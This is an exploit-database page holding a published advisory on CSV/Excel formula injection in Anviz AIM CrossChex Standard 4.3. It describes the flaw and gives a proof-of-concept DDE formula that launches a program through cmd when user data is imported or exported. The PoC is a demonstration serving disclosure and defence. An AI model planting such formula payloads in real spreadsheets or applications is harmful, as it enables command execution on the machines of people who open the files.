b786988389
9 changes to exploits/shellcodes WinMTR 0.91 - Denial of Service (PoC) CdCatalog 2.3.1 - Denial of Service (PoC) Zint Barcode Generator 2.6 - Denial of Service (PoC) Anviz AIM CrossChex Standard 4.3 - CSV Injection Fantastic Blog CMS 1.0 - 'id' SQL Injection Jelastic 5.4 - 'host' SQL Injection Gate Pass Management System 2.1 - 'login' SQL Injection qdPM 9.1 - 'filter_by' SQL Injection Yot CMS 3.3.1 - 'aid' SQL Injection
27 lines
No EOL
1.1 KiB
Text
27 lines
No EOL
1.1 KiB
Text
# Exploit Title: Anviz AIM CrossChex Standard 4.3 - CSV Injection
|
|
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
|
|
# Date: 2018-11-01
|
|
# Vendor: Anviz Biometric Technology Co., Ltd.
|
|
# Product web page: https://www.anviz.com
|
|
# Affected version: 4.3.6.0
|
|
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
|
# CVE: N/A
|
|
# References
|
|
# Advisory ID: ZSL-2018-5498
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5498.php
|
|
|
|
# Desc: CSV (XLS) Injection (Excel Macro Injection or Formula
|
|
# Injection) exists in the AIM CrossChex 4.3 when importing
|
|
# or exporting users using xls Excel file. This can be exploited
|
|
# to execute arbitrary commands on the affected system via
|
|
# SE attacks when an attacker inserts formula payload in the
|
|
# 'Name' field when adding a user or using the custom fields
|
|
# 'Gender', 'Position', 'Phone', 'Birthday', 'Employ Date'
|
|
# and 'Address'. Upon importing, the application will launch
|
|
# Excel program and execute the malicious macro formula.
|
|
|
|
# PoC
|
|
# From the menu:
|
|
|
|
User -> Add -> use payload: =cmd|' /C mspaint'!L337
|
|
User -> Import / Export: use payload: =cmd|' /C mspaint'!L337 |